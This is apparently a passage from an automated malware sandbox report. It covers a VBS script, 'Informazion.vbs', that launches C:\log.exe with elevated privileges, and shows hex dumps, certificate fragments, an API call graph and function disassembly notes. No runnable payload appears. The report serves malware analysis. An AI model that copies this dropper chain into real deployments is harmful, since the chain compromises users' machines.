29 36 2e 36 58 36 5d 36 8b 36 98 36 a5 36 aa 36 c1 36 ce 36 d3 36 2b 37 38 37 45 37 4a 37 61 37 6e 37 73 37 a6 37 ab 37 da 37 e7 37 f4 37 f9 37 0c 38 19 38 1e 38 45 38 4e 38 9b 38 a8 38
                  Data Ascii: 55P6U66667J888889::2:c:6;;;;<|<<<<='=H=_==>9>Y>>>??G?L????pH0C0d0000!171L1112(3S3b3333444*4/4Y4^4444444455;5H5U5Z5q5~555555666)6.6X6]66666666+787E7J7a7n7s7777777888E8N888
                  2023-01-13 15:04:35 UTC1399INData Raw: 31 48 31 4e 31 6a 31 70 31 8a 31 a0 31 a5 31 ce 31 f6 31 fc 31 02 32 08 32 14 32 1a 32 26 32 2c 32 45 32 4b 32 5a 32 60 32 a1 33 b0 33 b6 33 0c 34 17 34 41 34 5d 34 7b 34 90 34 a7 34 d5 34 96 37 2c 38 c8 38 e6 39 f2 39 fb 39 09 3a 18 3a 29 3a 30 3a 3c 3a 42 3a 73 3a a6 3a d2 3a 01 3b 1c 3b 29 3b 41 3b 54 3b 59 3b 71 3b 89 3b fc 3b 13 3c fc 3c 05 3e 91 3e a3 3e ac 3e b4 3e ba 3e c2 3e d8 3e de 3e eb 3e f1 3e fa 3e 01 3f 24 3f 57 3f 61 3f 6b 3f d7 3f 00 00 00 70 06 00 60 00 00 00 84 30 97 30 9c 30 44 31 54 31 6e 32 dd 32 e2 32 26 34 3b 35 84 35 b2 35 03 36 31 36 6c 37 7a 37 1b 38 4b 38 5b 38 b0 38 0b 39 19 39 68 39 76 39 80 3a cd 3a ab 3b f8 3b fd 3b 32 3c 37 3c 9b 3c fd 3c 38 3d 3d 3d 5e 3d 65 3d 6d 3d 7c 3d ff 3d 06 3e 3d 3e 4a 3e 00 00 00 80 06 00 a8 00
                  Data Ascii: 1H1N1j1p11111112222&2,2E2K2Z2`233344A4]4{44447,88999::):0:<:B:s:::;;);A;T;Y;q;;;<<>>>>>>>>>>>>?$?W?a?k??p`000D1T1n222&4;555616l7z78K8[8899h9v9::;;;2<7<<<8===^=e=m=|==>=>J>
                  2023-01-13 15:04:35 UTC1407INData Raw: 00 5c 00 00 00 58 30 f4 30 05 32 21 33 88 33 d3 33 22 35 50 35 01 38 13 38 25 38 4b 38 56 38 66 38 9f 38 ef 38 f5 38 68 39 31 3a 67 3a 87 3a b3 3a 92 3b 9f 3b ca 3b a2 3d ad 3d c0 3d ca 3d e8 3d f3 3d 4e 3e 6a 3e d0 3e e8 3e 18 3f 40 3f 72 3f 8c 3f b2 3f c4 3f 00 00 00 30 0c 00 64 00 00 00 70 30 a1 30 1e 32 ad 32 5e 33 3d 36 dc 36 0a 39 10 39 16 39 1c 39 43 39 6f 39 9b 39 a6 39 ad 39 b9 39 c3 39 cd 39 d1 39 d7 39 db 39 e3 39 ed 39 03 3a 14 3a 46 3a 52 3b 5d 3b 64 3b 6a 3b 79 3b 84 3b 8a 3b 90 3b a4 3b ac 3b 02 3c 16 3c e4 3c 58 3d 66 3d 35 3f 40 3f 4d 3f 59 3f 00 40 0c 00 a0 00 00 00 82 30 ed 30 07 31 14 31 44 31 68 31 73 31 80 31 a2 31 11 32 22 32 6a 32 83 32 07 33 1c 33 25 33 2e 33 4e 33 39 34 69 34 b9 34 08 35 4e 35 5e 35 7e 35 84 35 90 35 af 35 b5 35
                  Data Ascii: \X002!333"5P588%8K8V8f8888h91:g:::;;;======N>j>>>?@?r????0dp0022^3=669999C9o999999999999::F:R;];d;j;y;;;;;;<<<X=f=5?@?M?Y?@0011D1h1s1112"2j2233%3.3N394i445N5^5~55555
                  2023-01-13 15:04:35 UTC1415INData Raw: 34 b4 34 bc 34 c0 34 c4 34 c8 34 cc 34 d0 34 d4 34 d8 34 dc 34 e0 34 e8 34 ec 34 f0 34 f4 34 f8 34 fc 34 00 35 04 35 08 35 0c 35 10 35 18 35 1c 35 20 35 24 35 28 35 2c 35 30 35 34 35 38 35 3c 35 40 35 44 35 48 35 4c 35 50 35 54 35 58 35 5c 35 60 35 64 35 68 35 6c 35 70 35 74 35 78 35 7c 35 80 35 84 35 88 35 8c 35 90 35 94 35 9c 35 a4 35 ac 35 b4 35 bc 35 c4 35 cc 35 d4 35 dc 35 e4 35 ec 35 f4 35 fc 35 04 36 0c 36 14 36 1c 36 20 36 24 36 28 36 2c 36 30 36 3c 36 40 36 44 36 48 36 4c 36 50 36 54 36 58 36 5c 36 60 36 64 36 68 36 6c 36 70 36 74 36 78 36 80 36 84 36 88 36 8c 36 90 36 94 36 9c 36 a0 36 a4 36 a8 36 ac 36 b0 36 b4 36 b8 36 bc 36 c0 36 c4 36 c8 36 cc 36 d0 36 d4 36 d8 36 dc 36 e0 36 e4 36 e8 36 ec 36 f0 36 f4 36 f8 36 fc 36 00 37 04 37 08 37 0c 37
                  Data Ascii: 4444444444444444445555555 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|555555555555555555556666 6$6(6,606<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x666666666666666666666666666666667777
                  2023-01-13 15:04:35 UTC1423INData Raw: d6 ff a4 97 8f 90 00 fe b8 85 71 d1 20 06 ca 16 2e 0b 60 59 bd 31 b1 44 4c e6 44 41 9e be fa 79 6a 6b f4 3d d8 d2 72 bf e4 6c 19 00 af 81 0e e8 3b 86 bc 85 4d 8a eb f7 b9 ae 60 22 ee 20 88 a9 d6 72 87 6c 8e cb c0 a5 8c 50 53 50 8d 79 48 9a fd a1 4c f7 94 9e f5 c5 09 d7 5d c3 74 16 c4 3d dc 9c 3b 31 dd ac b3 14 0f b2 a4 33 ca d2 86 77 31 68 d5 e1 9b f2 e8 24 a4 13 02 03 01 00 01 a3 82 01 9c 30 82 01 98 30 1f 06 03 55 1d 23 04 18 30 16 80 14 0f 2a cb 20 87 28 b8 ec 6f 48 ae 2b 54 a6 29 aa 17 a4 cd 0c 30 1d 06 03 55 1d 0e 04 16 04 14 ff 81 bd 4d 75 16 75 02 b0 be 63 75 70 ab 31 77 db d2 e0 3f 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 07 80 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 03 30 11 06 09 60
                  Data Ascii: q .`Y1DLDAyjk=rl;M`" rlPSPyHL]t=;13w1h$00U#0* (oH+T)0UMuucup1w?0U0U00U%0+0`
                  2023-01-13 15:04:35 UTC1431INData Raw: 6f 63 73 70 2e 73 65 63 74 69 67 6f 2e 63 6f 6d 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 03 82 02 01 00 73 da ed 68 72 cb c2 b9 40 a1 31 bb b4 03 a3 2d 14 7b 24 e7 b4 5b 15 7d a8 e9 fd ad d1 92 0d 7c 3d 36 a0 69 d9 f3 9a 30 da ac 69 d6 74 57 24 3f 7e 0f 3c d9 f5 c3 79 25 6c 26 e8 8d 68 93 ce f1 77 89 39 7f a8 04 05 da 34 c3 14 ea 9f 08 54 ab ff c4 7e 96 6c 2b d3 94 eb b4 6c e0 45 4d 2c b2 f7 3b 3b 5a b5 c1 fb d7 89 75 6d 98 72 72 f6 f7 07 28 f3 d3 b2 d0 eb 19 be 15 2c 78 ef cd 45 a0 00 e4 f8 04 76 bb 57 c5 90 be 77 54 90 74 9e 0b 4f 4d c4 aa 13 8f 97 af 01 35 2b cb 9b 11 78 e9 f2 f9 89 04 3c 4e e3 82 12 62 eb b4 44 0c 75 41 c2 0f 34 b8 88 9d c8 22 f1 13 6a db 18 2f 6e 78 ad c4 05 b4 e8 84 08 93 07 f9 7d 83 fe 68 98 34 e4 77 e5 b1 ce 8c 94 6c db 03 6d
                  Data Ascii: ocsp.sectigo.com0*Hshr@1-{$[}|=6i0itW$?~<y%l&hw94T~l+lEM,;;Zumrr(,xEvWwTtOM5+x<NbDuA4"j/nx}h4wlm
                  2023-01-13 15:04:35 UTC1438INData Raw: 99 c1 05 8b ab 0c 2f f3 5c 3a cf 6c 37 55 09 87 de 53 40 6c 58 ef fc b6 ab 65 6e 04 f6 1b dc 3c e0 5a 15 c6 9e d9 f1 59 48 30 21 65 03 6c ec e9 21 73 ec 9b 03 a1 e0 37 ad a0 15 18 8f fa ba 02 ce a7 2c a9 10 13 2c d4 e5 08 26 ab 22 97 60 f8 90 5e 74 d4 a2 9a 53 bd f2 a9 68 e0 a2 6e c2 d7 6c b1 a3 0f 9e bf eb 68 e7 56 f2 ae f2 e3 2b 38 3a 09 81 b5 6b 85 d7 be 2d ed 3f 1a b7 b2 63 e2 f5 62 2c 82 d4 6a 00 41 50 f1 39 83 9f 95 e9 36 96 98 6e 30 82 06 ec 30 82 04 d4 a0 03 02 01 02 02 10 30 0f 6f ac dd 66 98 74 7c a9 46 36 a7 78 2d b9 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 4e 65 77 20 4a 65 72 73 65 79 31 14 30 12 06 03 55 04 07 13 0b 4a 65 72 73 65 79 20 43 69 74 79 31 1e 30
                  Data Ascii: /\:l7US@lXen<ZYH0!el!s7,,&"`^tShnlhV+8:k-?cb,jAP96n000oft|F6x-0*H010UUS10UNew Jersey10UJersey City10


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:16:04:33
                  Start date:13/01/2023
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs"
                  Imagebase:0x7ff76c320000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:1
                  Start time:16:04:36
                  Start date:13/01/2023
                  Path:C:\log.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\log.exe"
                  Imagebase:0xbb0000
                  File size:1477416 bytes
                  MD5 hash:AEB47B393079D8C92169F1EF88DD5696
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, ReversingLabs
                  • Detection: 3%, Virustotal, Browse
                  Reputation:low

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:0.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.3%
                    Total number of Nodes:294
                    Total number of Limit Nodes:23
                    execution_graph 50561 c04b20 50563 c04b2e 50561->50563 50562 c04b3a 50563->50562 50569 c410d0 50563->50569 50565 c27b5c FindFirstFileA 50566 c27b70 50565->50566 50567 c27b78 FindClose 50566->50567 50568 c27b98 50567->50568 50574 c169e0 50569->50574 50571 c410d8 50586 c3ea90 10 API calls 2 library calls 50571->50586 50573 c410e4 50573->50565 50575 c16a08 50574->50575 50582 c169f9 50574->50582 50587 beb850 50575->50587 50577 c16a98 GetUserNameA 50580 c16aae 50577->50580 50578 c16a12 50579 beb850 7 API calls 50578->50579 50581 c16a21 50579->50581 50584 c16ac9 GetUserNameA 50580->50584 50581->50582 50583 c16a28 GetProcAddress 50581->50583 50582->50577 50585 c16a7b ___from_strstr_to_strchr 50582->50585 50583->50582 50584->50585 50585->50571 50586->50573 50593 c16ea0 50587->50593 50591 beb869 LoadLibraryA 50592 beb87d 50591->50592 50592->50578 50594 beb85b 50593->50594 50595 c16eaa GetSystemDirectoryA 50593->50595 50598 be8420 _strlen 50594->50598 50595->50594 50596 c16ec0 50595->50596 50597 c16ee7 GetSystemDirectoryA 50596->50597 50597->50594 50597->50596 50599 be8450 50598->50599 50601 be8478 _strcat 50598->50601 50600 be8460 _strlen 50599->50600 50600->50600 50600->50601 50602 be8491 _strlen 50601->50602 50603 be84a8 _strcat 50602->50603 50604 be84d4 50602->50604 50605 be84b7 _strlen 50603->50605 50604->50591 50605->50603 50605->50604 50606 bcd790 50607 bcd7d5 50606->50607 50608 bcdb70 50606->50608 50609 bcdca0 50607->50609 50610 bcd7e1 50607->50610 50613 bcdb98 SendMessageA SendMessageA SendMessageA 50608->50613 50623 bcdcf9 50608->50623 50616 bcdcb8 KillTimer 50609->50616 50609->50623 50611 bcd7ed 50610->50611 50612 bcdd01 50610->50612 50648 bcf180 50611->50648 50657 bcf1e0 6 API calls 50612->50657 50636 bcdbf1 50613->50636 50618 bcdcd0 50616->50618 50617 bcdd0d 50617->50623 50619 bcdcd7 MessageBoxA 50618->50619 50620 bcdcee 50618->50620 50619->50620 50656 bf8140 GetWindowLongA 50620->50656 50621 bcd7f6 50625 bcd879 LoadIconA SendMessageA 50621->50625 50633 bcd830 50621->50633 50624 bcdc88 GetDlgItem 50626 bcdc9b DestroyWindow 50624->50626 50624->50636 50627 bf93a0 50625->50627 50626->50636 50628 bcd8ac 8 API calls 50627->50628 50631 bcdd49 SendMessageA 50628->50631 50645 bcd9fb _unexpected _strrchr 50628->50645 50629 bcdf25 50635 bcdf2d SendMessageA InvalidateRect SetFocus 50629->50635 50638 bcdd47 50631->50638 50632 bcdea5 50632->50629 50659 bd0660 19 API calls 50632->50659 50633->50625 50655 bd0660 19 API calls 50633->50655 50635->50623 50636->50624 50636->50632 50637 bcdd27 SendMessageA 50637->50638 50639 bcddf4 50638->50639 50642 bcddb0 50638->50642 50643 bcde0a SetTimer 50639->50643 50647 bcde23 50639->50647 50641 bcdaed _strlen SendMessageA 50644 bcdb3e SendMessageA 50641->50644 50641->50645 50642->50639 50658 bd0660 19 API calls 50642->50658 50643->50647 50644->50645 50645->50637 50645->50641 50646 bcde78 ShowWindow 50646->50623 50647->50646 50649 bcf18d SetWindowTextA 50648->50649 50650 bcf195 50648->50650 50649->50650 50651 bcf19e GetWindowLongA SetWindowLongA 50650->50651 50652 bcf1b8 GetDlgItem 50650->50652 50651->50621 50653 bcf1cf 50652->50653 50654 bcf1c8 DestroyWindow 50652->50654 50653->50621 50654->50653 50655->50633 50656->50623 50657->50617 50658->50642 50659->50632 50660 bcd550 CreateDialogParamA ShowWindow SetActiveWindow KiUserCallbackDispatcher 50661 bd35f0 50662 bd3602 50661->50662 50663 bd36ae 50662->50663 50664 bd3664 50662->50664 50669 bb69a0 GetDC SelectPalette 50663->50669 50666 bd3678 SetDlgItemTextA 50664->50666 50668 bd3688 50664->50668 50666->50668 50667 bd36ca 50669->50667 50670 bd30f0 50671 bd30fe 50670->50671 50672 bd316a SendDlgItemMessageA 50671->50672 50673 bd2e90 50674 bd2ea2 50673->50674 50675 bd2f00 SetDlgItemTextA 50674->50675 50676 beb9b0 50679 beba5e 50676->50679 50683 beb9db 50676->50683 50677 beba14 RegCreateKeyExA 50680 beba30 50677->50680 50677->50683 50678 beba40 RegOpenKeyExA 50678->50680 50678->50683 50680->50679 50681 beba69 RegCloseKey 50680->50681 50681->50679 50682 beba55 RegCloseKey 50682->50683 50683->50677 50683->50678 50683->50679 50683->50682 50684 be4b50 50685 beb850 7 API calls 50684->50685 50686 be4b5a 50685->50686 50687 be4b85 GetProcAddress 50686->50687 50688 beb850 7 API calls 50686->50688 50689 be4b95 50687->50689 50690 be4bd1 50687->50690 50691 be4b75 50688->50691 50692 be4ba2 GetProcAddress 50689->50692 50697 be4c2a 50689->50697 50693 beb850 7 API calls 50690->50693 50691->50687 50705 be5180 50691->50705 50695 be4bbd GetProcAddress 50692->50695 50692->50697 50694 be4bdb 50693->50694 50696 be4be7 GetProcAddress 50694->50696 50694->50697 50698 be4c13 50695->50698 50696->50697 50699 be4c01 GetProcAddress 50696->50699 50701 be4c4e GetProcAddress 50697->50701 50702 be4c5c 50697->50702 50698->50697 50700 be4c1c GetProcAddress 50698->50700 50699->50698 50700->50697 50701->50702 50703 be4c70 GetProcAddress 50702->50703 50713 be5004 50702->50713 50704 be4c8f GetProcAddress 50703->50704 50703->50713 50706 be4cae GetProcAddress 50704->50706 50704->50713 50707 be4ccd GetProcAddress 50706->50707 50706->50713 50708 be4cec GetProcAddress 50707->50708 50707->50713 50709 be4d0b GetProcAddress 50708->50709 50708->50713 50710 be4d2a GetProcAddress 50709->50710 50709->50713 50711 be4d49 GetProcAddress 50710->50711 50710->50713 50712 be4d68 GetProcAddress 50711->50712 50711->50713 50712->50713 50714 be4d87 GetProcAddress 50712->50714 50735 be5128 WSAStartup 50713->50735 50714->50713 50715 be4da6 GetProcAddress 50714->50715 50715->50713 50716 be4dc5 GetProcAddress 50715->50716 50716->50713 50717 be4de4 GetProcAddress 50716->50717 50717->50713 50718 be4e03 GetProcAddress 50717->50718 50718->50713 50719 be4e22 GetProcAddress 50718->50719 50719->50713 50720 be4e41 GetProcAddress 50719->50720 50720->50713 50721 be4e60 GetProcAddress 50720->50721 50721->50713 50722 be4e7f GetProcAddress 50721->50722 50722->50713 50723 be4e9e GetProcAddress 50722->50723 50723->50713 50724 be4ebd GetProcAddress 50723->50724 50724->50713 50725 be4edc GetProcAddress 50724->50725 50725->50713 50726 be4efb GetProcAddress 50725->50726 50726->50713 50727 be4f1a GetProcAddress 50726->50727 50727->50713 50728 be4f39 GetProcAddress 50727->50728 50728->50713 50729 be4f58 GetProcAddress 50728->50729 50729->50713 50730 be4f77 GetProcAddress 50729->50730 50730->50713 50731 be4f96 GetProcAddress 50730->50731 50731->50713 50732 be4fb5 GetProcAddress 50731->50732 50732->50713 50733 be4fd4 GetProcAddress 50732->50733 50733->50713 50734 be4ff3 GetProcAddress 50733->50734 50734->50735 50736 be514e WSAStartup 50735->50736 50737 be5141 50735->50737 50738 be515f 50736->50738 50739 be516c WSAStartup 50736->50739 50737->50705 50737->50736 50738->50705 50738->50739 50739->50705 50740 c5c933 50741 c5c944 50740->50741 50742 c5c94f 50741->50742 50743 c5c95b 50741->50743 50752 c64026 14 API calls __dosmaperr 50742->50752 50753 c5ca9e 22 API calls 4 library calls 50743->50753 50746 c5c955 50747 c5c962 50754 c64026 14 API calls __dosmaperr 50747->50754 50749 c5c97f 50755 c64026 14 API calls __dosmaperr 50749->50755 50751 c5c985 50752->50746 50753->50747 50754->50749 50755->50751 50756 c64971 50757 c649af 50756->50757 50758 c6497f _strftime 50756->50758 50764 c5c4eb 14 API calls __dosmaperr 50757->50764 50758->50757 50759 c6499a RtlAllocateHeap 50758->50759 50763 c64362 EnterCriticalSection LeaveCriticalSection _strftime 50758->50763 50759->50758 50761 c649ad 50759->50761 50763->50758 50764->50761 50765 c4e51e SetUnhandledExceptionFilter 50766 bb46e0 50767 bb46fd 50766->50767 50768 beb850 7 API calls 50767->50768 50769 bb4707 50768->50769 50770 beb850 7 API calls 50769->50770 50771 bb4716 50770->50771 50772 beb850 7 API calls 50771->50772 50773 bb4725 GetProcAddress GetProcAddress 50772->50773 50775 bb4757 GetProcAddress 50773->50775 50777 bb4770 GetProcAddress GetProcAddress GetProcAddress 50775->50777 50779 bb47b9 GetProcAddress 50777->50779 50781 bb47d2 GetProcAddress GetProcAddress 50779->50781 50783 bb4804 50781->50783 50784 bb480e CoInitialize 50783->50784 50785 bb4820 50784->50785 50786 bb4830 MessageBoxA 50785->50786 50787 bb484b 50786->50787 50788 bcf780 MapDialogRect 50789 bcf7c9 CreateWindowExA SendMessageA 50788->50789 50792 bcf83b 50788->50792 50790 bcf818 50789->50790 50791 bcf81f SetWindowPos 50790->50791 50790->50792 50791->50792 50793 bd31a0 50795 bd31ae 50793->50795 50794 bd3232 SendDlgItemMessageA SendDlgItemMessageA 50795->50794 50796 bd42c0 50797 bd42e4 50796->50797 50803 bd42c9 50796->50803 50798 beb850 7 API calls 50797->50798 50800 bd42ee 50798->50800 50799 bd4313 50801 bd42fa GetProcAddress 50800->50801 50800->50803 50801->50803 50802 bd42d7 SetCurrentProcessExplicitAppUserModelID 50803->50799 50803->50802 50804 c4dfba 50805 c4dfc6 ___scrt_is_nonwritable_in_current_image 50804->50805 50829 c4e265 50805->50829 50807 c4dfcd 50808 c4e120 50807->50808 50817 c4dff7 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 50807->50817 50845 c4e52a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _unexpected 50808->50845 50810 c4e127 50811 c4e12d 50810->50811 50846 c5a36e 23 API calls _unexpected 50810->50846 50847 c5a384 23 API calls _unexpected 50811->50847 50814 c4e135 50815 c4e016 50816 c4e097 50841 c4e4a6 GetStartupInfoW _unexpected 50816->50841 50817->50815 50817->50816 50819 c4e090 50817->50819 50840 c5a3b8 16 API calls 2 library calls 50819->50840 50821 c4e09d 50842 c4e4d7 GetModuleHandleW 50821->50842 50823 c4e0b9 50823->50810 50824 c4e0bd 50823->50824 50825 c4e0c6 50824->50825 50843 c5a39a 23 API calls _unexpected 50824->50843 50844 c4e29e ___vcrt_FlsFree DeleteCriticalSection ___scrt_uninitialize_crt 50825->50844 50828 c4e0ce 50828->50815 50830 c4e26e 50829->50830 50848 c4e745 IsProcessorFeaturePresent 50830->50848 50832 c4e27a 50849 c4eb1f 4 API calls 2 library calls 50832->50849 50834 c4e27f 50835 c4e283 50834->50835 50850 c510b8 50834->50850 50835->50807 50838 c4e29a 50838->50807 50840->50816 50841->50821 50842->50823 50843->50825 50844->50828 50845->50810 50846->50811 50847->50814 50848->50832 50849->50834 50854 c64060 50850->50854 50853 c4eb3e ___vcrt_FlsFree DeleteCriticalSection ___vcrt_uninitialize_locks ___vcrt_uninitialize_ptd 50853->50835 50855 c64070 50854->50855 50856 c4e28c 50854->50856 50855->50856 50858 c63635 50855->50858 50856->50838 50856->50853 50859 c63641 ___scrt_is_nonwritable_in_current_image 50858->50859 50864 c62fc3 EnterCriticalSection 50859->50864 50861 c63648 50865 c6a7b0 50861->50865 50863 c63657 50863->50855 50864->50861 50866 c6a7bc ___scrt_is_nonwritable_in_current_image 50865->50866 50867 c6a7e6 50866->50867 50868 c6a7c5 50866->50868 50878 c62fc3 EnterCriticalSection 50867->50878 50886 c5c4eb 14 API calls __dosmaperr 50868->50886 50871 c6a7ca 50887 c640f9 8 API calls _strftime 50871->50887 50873 c6a7d4 50873->50863 50874 c6a81e 50888 c6a845 LeaveCriticalSection _unexpected 50874->50888 50875 c6a7f2 50875->50874 50879 c6a700 50875->50879 50878->50875 50889 c65bd4 50879->50889 50881 c6a71f 50897 c64026 14 API calls __dosmaperr 50881->50897 50882 c6a712 50882->50881 50896 c62847 6 API calls __dosmaperr 50882->50896 50885 c6a774 50885->50875 50886->50871 50887->50873 50888->50873 50895 c65be1 _strftime 50889->50895 50890 c65c21 50899 c5c4eb 14 API calls __dosmaperr 50890->50899 50891 c65c0c RtlAllocateHeap 50893 c65c1f 50891->50893 50891->50895 50893->50882 50895->50890 50895->50891 50898 c64362 EnterCriticalSection LeaveCriticalSection _strftime 50895->50898 50896->50882 50897->50885 50898->50895 50899->50893 50900 bf7fa0 LoadCursorA RegisterClassA CreateDialogParamA SetWindowLongA 50901 bf8097 KiUserCallbackDispatcher 50900->50901 50902 bf80bc 50901->50902 50907 bf8090 50901->50907 50904 bf80c8 DestroyWindow 50902->50904 50905 bf80be PostQuitMessage 50902->50905 50903 bf80ab IsDialogMessageA 50906 bf80b3 DispatchMessageA 50903->50906 50903->50907 50908 bf80de 50904->50908 50905->50904 50906->50907 50907->50901 50907->50903 50907->50904

                    Executed Functions

                    Function 00BB46E0 Relevance: 45.6, APIs: 11, Strings: 15, Instructions: 103libraryloaderwindowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00BB473A
                    • GetProcAddress.KERNEL32(00000000,ToUnicodeEx), ref: 00BB4747
                    • GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 00BB4766
                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00BB4785
                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00BB4792
                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00BB479F
                    • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00BB47C8
                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00BB47E7
                    • GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00BB47F4
                    • CoInitialize.OLE32(00000000), ref: 00BB4815
                    • MessageBoxA.USER32 ref: 00BB483F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$InitializeLibraryLoadMessage
                    • String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll$3k
                    • API String ID: 2501503455-4166699630
                    • Opcode ID: 0bcac98597ee40e7410d3dad83198a0e7a09ce96f6bfd31466cc904d4ee8a5a7
                    • Instruction ID: 03e199b10535fc9e52f9b97744475bb19990421267265c7e7b0a1590b3fd6782
                    • Opcode Fuzzy Hash: 0bcac98597ee40e7410d3dad83198a0e7a09ce96f6bfd31466cc904d4ee8a5a7
                    • Instruction Fuzzy Hash: 3731E4F1A817916BC7027B726C5ABBE36E4FB02705F490575F80296292EFA48D00C796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C169E0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 281 c169e0-c169f7 282 c169f9-c16a01 281->282 283 c16a08-c16a26 call beb850 * 2 281->283 285 c16a03 282->285 286 c16a4b-c16a57 282->286 296 c16a38 283->296 297 c16a28-c16a36 GetProcAddress 283->297 287 c16a98-c16aac GetUserNameA 285->287 292 c16a5b-c16a79 call be9070 286->292 290 c16ab3-c16aba 287->290 291 c16aae-c16ab1 287->291 294 c16abf-c16ad8 call be9070 GetUserNameA 290->294 291->294 307 c16a7b-c16a88 call c50b10 292->307 308 c16a8f-c16a95 call be9100 292->308 302 c16ae5-c16af7 call c4dc50 294->302 303 c16ada-c16ae3 call be9100 294->303 300 c16a3a-c16a49 296->300 297->300 300->286 300->287 303->302 307->302 315 c16a8a-c16a8d 307->315 308->287 315->302
                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00C16A2E
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C16A7E
                    • GetUserNameA.ADVAPI32(00000000), ref: 00C16AA4
                    • GetUserNameA.ADVAPI32(00000000), ref: 00C16AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: NameUser$AddressProc___from_strstr_to_strchr
                    • String ID: GetUserNameExA$Logical name of remote host (e.g. for SSH key lookup):$secur32.dll$sspicli.dll
                    • API String ID: 1511097851-421106942
                    • Opcode ID: 9201fe4f8725ec5e866833d246ba1b1100a99c676d941024c2e18e6a1091e3b4
                    • Instruction ID: deffca15e6b6377e73f698859d33cb646e587def55175309c146da3d666a3b47
                    • Opcode Fuzzy Hash: 9201fe4f8725ec5e866833d246ba1b1100a99c676d941024c2e18e6a1091e3b4
                    • Instruction Fuzzy Hash: 1221ECB0A4434167EB106B25AC0BF6F36D49F42B04F09402CF846AB291EB659A84E793
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4E51E Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0009E645,00C4DFAD), ref: 00C4E523
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
